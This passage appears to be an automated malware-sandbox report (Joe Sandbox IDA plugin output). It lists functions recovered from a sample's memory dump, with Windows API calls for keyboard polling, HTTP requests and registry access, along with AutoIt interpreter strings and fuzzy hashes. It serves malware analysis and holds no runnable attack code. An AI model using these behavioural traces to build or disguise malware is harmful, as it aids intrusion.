Opcode Fuzzy Hash: bcd9d6487b4d73d53bd5d2c348a4cda4ea0961d2080e6b30e1cd5b203a693ab7
Instruction Fuzzy Hash: 5A617931518701DFFB769F18D948B3A77F6FF40316F108628E08A46960C779A892EF92

Function 00032581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 000329AB: GetWindowLongW.USER32(?,000000EB), ref: 000329BC

GetSysColor.USER32(0000000F), ref: 000325AF

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: f8abc08ff0305e207ce4a2281b732f57cd43d1abfc59f6692f89365a98a533dc
Instruction ID: 1b41eb443c9d8eff4f89dce4b4412ff881e16fb4b13658e4d96a1cb84db881b7
Opcode Fuzzy Hash: f8abc08ff0305e207ce4a2281b732f57cd43d1abfc59f6692f89365a98a533dc
Instruction Fuzzy Hash: 4F41D531004540EFEB225F28DC99FB937AAEF0A335F184261FDA58A1E2C7348D41EB21

Function 000429BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00050B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00042A3E,?,00008000), ref: 00050BA7

Part of subcall function 00050284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00042A58,?,00008000), ref: 000502A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00042ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00042C2C

Part of subcall function 00043EBE: _wcscpy.LIBCMT ref: 00043EF6

Part of subcall function 0005386D: _iswctype.LIBCMT ref: 00053875

Strings

AU3!, xrefs: 00042A93
Bad directive syntax error, xrefs: 0008008F
EA06, xrefs: 0007FD48
Unterminated string, xrefs: 000800D6
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0007FD17
Error opening the file, xrefs: 0007FD33, 0007FDAA

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: c4b44212ce4672dd3c0cfd4d7f2261eefc21a27863fd4c6fcc3627ce0eff5b9a
Instruction ID: 88ee61cce8c114f1da769ad9e3680cd73c205f4978a4d7408551fd10d4cb5a47
Opcode Fuzzy Hash: c4b44212ce4672dd3c0cfd4d7f2261eefc21a27863fd4c6fcc3627ce0eff5b9a
Instruction Fuzzy Hash: 2802ADB05083419FC764EF24C881AEFBBE5BF99314F40492DF499932A2DB30DA49CB56

Function 00090508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00090530
GetAsyncKeyState.USER32(000000A0), ref: 000905B1
GetKeyState.USER32(000000A0), ref: 000905CC
GetAsyncKeyState.USER32(000000A1), ref: 000905E6
GetKeyState.USER32(000000A1), ref: 000905FB
GetAsyncKeyState.USER32(00000011), ref: 00090613
GetKeyState.USER32(00000011), ref: 00090625
GetAsyncKeyState.USER32(00000012), ref: 0009063D
GetKeyState.USER32(00000012), ref: 0009064F
GetAsyncKeyState.USER32(0000005B), ref: 00090667
GetKeyState.USER32(0000005B), ref: 00090679

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 861119933f9dccfb0083611f975a5f08e5a8cc702de43022602d63c356c61377
Instruction ID: 79073ea02e5c6b9357a4367289c7d4b5d068b6071520f708bba2a74aeaf3ff15
Opcode Fuzzy Hash: 861119933f9dccfb0083611f975a5f08e5a8cc702de43022602d63c356c61377
Instruction Fuzzy Hash: C241CA70504BCA6EFFB1976488047B7BEE06F51344F08805ED9C6475C1EBA899D8EFA2

Function 000A8AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00034D37: __itow.LIBCMT ref: 00034D62
Part of subcall function 00034D37: __swprintf.LIBCMT ref: 00034DAC

CoInitialize.OLE32 ref: 000A8AED
CoUninitialize.OLE32 ref: 000A8AF8
CoCreateInstance.OLE32(?,00000000,00000017,000C3BBC,?), ref: 000A8B58
IIDFromString.OLE32(?,?), ref: 000A8BCB
VariantInit.OLEAUT32(?), ref: 000A8C65
VariantClear.OLEAUT32(?), ref: 000A8CC6

Strings

Invalid parameter, xrefs: 000A8BE4
Failed to create object, xrefs: 000A8B63, 000A8C19
NULL Pointer assignment, xrefs: 000A8B9D

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 92b8dc648f303267013fe3bda1d1ccbbad41f967fad296dff5f91dd966b10890
Instruction ID: 275ab627dfe35242d8fac54a4e7560ae360dd2196b29f52b495c7b430609f1d7
Opcode Fuzzy Hash: 92b8dc648f303267013fe3bda1d1ccbbad41f967fad296dff5f91dd966b10890
Instruction Fuzzy Hash: F561A0702087119FD710DF94C889F9EB7E8BF46714F108819F9859B291DB74ED48CBA2

Function 0009443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00094451
__swprintf.LIBCMT ref: 0009445E

Part of subcall function 000538C8: __woutput_l.LIBCMT ref: 00053921

FindResourceW.KERNEL32(?,?,0000000E), ref: 00094488
LoadResource.KERNEL32(?,00000000), ref: 00094494
LockResource.KERNEL32(00000000), ref: 000944A1
FindResourceW.KERNEL32(?,?,00000003), ref: 000944C1
LoadResource.KERNEL32(?,00000000), ref: 000944D3
SizeofResource.KERNEL32(?,00000000), ref: 000944E2
LockResource.KERNEL32(?), ref: 000944EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0009454F

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 7354719aef06e0938235cab32987b381c5916657201067773fedd6880106b604
Instruction ID: 60a03007b29d358f495e58f5d6a90afa0eb42b4906999ef68224a86594576b51
Opcode Fuzzy Hash: 7354719aef06e0938235cab32987b381c5916657201067773fedd6880106b604
Instruction Fuzzy Hash: 8431617150161AEBEF119FA0ED58EBF7BACEF04341F048415F915D6151E738DA22EB60

Function 0006C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0003260D
SetTextColor.GDI32(?,000000FF), ref: 00032617
SetBkMode.GDI32(?,00000001), ref: 0003262C
GetStockObject.GDI32(00000005), ref: 00032634
GetClientRect.USER32(?), ref: 0006C0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 0006C113
GetWindowDC.USER32(?), ref: 0006C11F
GetPixel.GDI32(00000000,?,?), ref: 0006C12E
ReleaseDC.USER32(?,00000000), ref: 0006C140
GetSysColor.USER32(00000005), ref: 0006C15E

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: c8d7e34d49174987b8be1d7cb425fa7b13d047649fff3def8e4225dc852b63c1
Instruction ID: 5c0bfaf5b6f5f413cf74f866929e54185cb38d2645299f7baab50c7ac92b220b
Opcode Fuzzy Hash: c8d7e34d49174987b8be1d7cb425fa7b13d047649fff3def8e4225dc852b63c1
Instruction Fuzzy Hash: 40117931500605FFEBA25FA4EC08FA97BA6EF49321F144221FA6A950E1CB350A91EF10

Function 000BC634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000329E2: GetWindowLongW.USER32(?,000000EB), ref: 000329F3

Part of subcall function 00032714: GetCursorPos.USER32(?), ref: 00032727
Part of subcall function 00032714: ScreenToClient.USER32(000F77B0,?), ref: 00032744
Part of subcall function 00032714: GetAsyncKeyState.USER32(00000001), ref: 00032769
Part of subcall function 00032714: GetAsyncKeyState.USER32(00000002), ref: 00032777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 000BC69C
ImageList_EndDrag.COMCTL32 ref: 000BC6A2
ReleaseCapture.USER32 ref: 000BC6A8
SetWindowTextW.USER32(?,00000000), ref: 000BC752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 000BC765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 000BC847

Strings

@GUI_DROPID, xrefs: 000BC799
@GUI_DRAGFILE, xrefs: 000BC7DC

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 18fb90b6d5fd24df719a910227965cf405f329492eaf72f9c274b2f109f0d827
Instruction ID: fdf2ac335daa8e8553ef5d84f384541a356786d061531ab7244003323de7bb12
Opcode Fuzzy Hash: 18fb90b6d5fd24df719a910227965cf405f329492eaf72f9c274b2f109f0d827
Instruction Fuzzy Hash: 5751A070608304AFE704EF14CC5AFAA7BE5FB84310F00852DF9558B2E2CB74A955DB52

Function 000A20E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000A211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000A2148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 000A218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000A219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000A21AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 000A21DC
InternetCloseHandle.WININET(00000000), ref: 000A2223

Part of subcall function 000A2B4F: GetLastError.KERNEL32(?,?,000A1EE3,00000000,00000000,00000001), ref: 000A2B64
Part of subcall function 000A2B4F: SetEvent.KERNEL32(?,?,000A1EE3,00000000,00000000,00000001), ref: 000A2B79

Strings

, xrefs: 000A21CD

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 55a83a0b6909d20cb274581bfd5e85a345a51194baf1d61b71c1b511ed86f49a
Instruction ID: 6e6ee88c8cd67556b077e200d4e6c22d17775bbc06758b7465a06d8a56bfc426
Opcode Fuzzy Hash: 55a83a0b6909d20cb274581bfd5e85a345a51194baf1d61b71c1b511ed86f49a
Instruction Fuzzy Hash: 1A414AB1905208BFEB169F94CC89FFB7BACEB09354F004126FA059A192D7749E54DBA0

Function 0008A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0008B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0008B54D
Part of subcall function 0008B52D: GetCurrentThreadId.KERNEL32 ref: 0008B554
Part of subcall function 0008B52D: AttachThreadInput.USER32(00000000,?,0008A23B,?,00000001), ref: 0008B55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 0008A246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0008A263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0008A266
MapVirtualKeyW.USER32(00000025,00000000), ref: 0008A26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0008A28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0008A290
MapVirtualKeyW.USER32(00000025,00000000), ref: 0008A299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0008A2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0008A2B3

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 14f95a1b7105b33eec4d061e592a9cf9eb4ae8d6ef12554acdcaec2e84d514fb
Instruction ID: 47a74d1d4ce2cc9333a79c5e8ddc38d9565bde9fe6b2fd487c845e9fa827307c
Opcode Fuzzy Hash: 14f95a1b7105b33eec4d061e592a9cf9eb4ae8d6ef12554acdcaec2e84d514fb
Instruction Fuzzy Hash: 9611E1B1A50618FEF6206F649C8AFAA7B2DEB4C750F110419F7806B0D1CAF35C50DBA0

Function 000AA20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 000AA28E, 000AA5B2
Not an Object type, xrefs: 000AA265

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 1aeeb91f067897beb889de9949e3266d70857961ff4cf01f3a453e39058624d3
Instruction ID: 9225b32ac6644e668b84c615e4c07b9a731af3757aedccebe75c285c5e694b1f
Opcode Fuzzy Hash: 1aeeb91f067897beb889de9949e3266d70857961ff4cf01f3a453e39058624d3
Instruction Fuzzy Hash: FAC18E71F0021A9FDF24DFA8C884BAEB7F5BB4A350F148569F905AB281E7709D44CB91

Function 000947E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00094802
LoadStringW.USER32(00000000), ref: 00094809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0009481F
LoadStringW.USER32(00000000), ref: 00094826
_wprintf.LIBCMT ref: 0009484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0009486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00094847

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: c01f8cc3ab211dfc56d5a56bd88ebeace3b6a18832c949e01704f06a7865458b
Instruction ID: 828f697e4b47a98992679427f80d83d500f0c04675ab6e22e5a51c7d3d6ef609
Opcode Fuzzy Hash: c01f8cc3ab211dfc56d5a56bd88ebeace3b6a18832c949e01704f06a7865458b
Instruction Fuzzy Hash: 6F0162F2900248BFFB519BA09D89EFB736CE708301F400595BB49E2141EA789E848B75

Function 000B0371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77

Part of subcall function 000B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000B040D,?,?), ref: 000B1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000B044E

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 6838c516d7a97dfdf3878bcdf68edf46ac9e494f351f5d69ba9616777f46040d
Instruction ID: d47a67450df706d989c4889a88a35b9e565ef1564b237f8ab8ff9c668e4926fc
Opcode Fuzzy Hash: 6838c516d7a97dfdf3878bcdf68edf46ac9e494f351f5d69ba9616777f46040d
Instruction Fuzzy Hash: F7A176702042019FCB21EF24C885FAEBBE5AF84314F14891DF9969B2A2DB35E955CF46

Function 000B67F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 000B6810
GetDC.USER32(00000000), ref: 000B6818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 000B6823
ReleaseDC.USER32(00000000,00000000), ref: 000B682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 000B686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 000B687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,000B964F,?,?,000000FF,00000000,?,000000FF,?), ref: 000B68B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000B68D6

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 2925dcf9d67d81bc138334405c4bc0e9108b5f2fb8a59977c20ff51eb7a1b192
Instruction ID: 210fed802b383485492d2151fa408f073a0f061c5feaaf6afb3441e47987fc9a
Opcode Fuzzy Hash: 2925dcf9d67d81bc138334405c4bc0e9108b5f2fb8a59977c20ff51eb7a1b192
Instruction Fuzzy Hash: 4F314B72101214BFEB118F50CC8AFEA3BA9EB49765F044165FE08AA291D67A9851CBB4

Function 0008C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0008C75D
_memcmp.LIBCMT ref: 0008C77F
_memcmp.LIBCMT ref: 0008C797
_memcmp.LIBCMT ref: 0008C7AA
_memcmp.LIBCMT ref: 0008C7C4
_memcmp.LIBCMT ref: 0008C7D7
_memcmp.LIBCMT ref: 0008C7EF
_memcmp.LIBCMT ref: 0008C80A

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 601d15da23ddfdc03c5e3d70f7e78e33e4c69308e26948c46a509b822fc8bd3b
Instruction ID: 55edcf6007b9d9422c9828d59c50cac90dc8552c7c498b4a330e2066d43ee133
Opcode Fuzzy Hash: 601d15da23ddfdc03c5e3d70f7e78e33e4c69308e26948c46a509b822fc8bd3b
Instruction Fuzzy Hash: F121B0726096057AB21476219D82FEF37BCBF25794B048024FE46AA343EB30DE158BB1

Function 000B68F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 000B6911
GetWindowLongW.USER32(016B55F0,000000F0), ref: 000B6944
GetWindowLongW.USER32(016B55F0,000000F0), ref: 000B6979
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 000B69AB
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 000B69D5
GetWindowLongW.USER32(?,000000F0), ref: 000B69E6
SetWindowLongW.USER32(?,000000F0,00000000), ref: 000B6A00

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 3d1bd08a12b5d888d58dd505e20a7eb020c4235367c43e158e399935a9d694d4
Instruction ID: f0a9a9c3ccc58fcd6f801440a0c0bb3154a8032465293ed6d33ad9892be22b77
Opcode Fuzzy Hash: 3d1bd08a12b5d888d58dd505e20a7eb020c4235367c43e158e399935a9d694d4
Instruction Fuzzy Hash: F7311330644250AFEB61CF18DC88FA537E9FB4A754F1801A4F5198B2B2CB7AAC40DB51

Function 0008E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

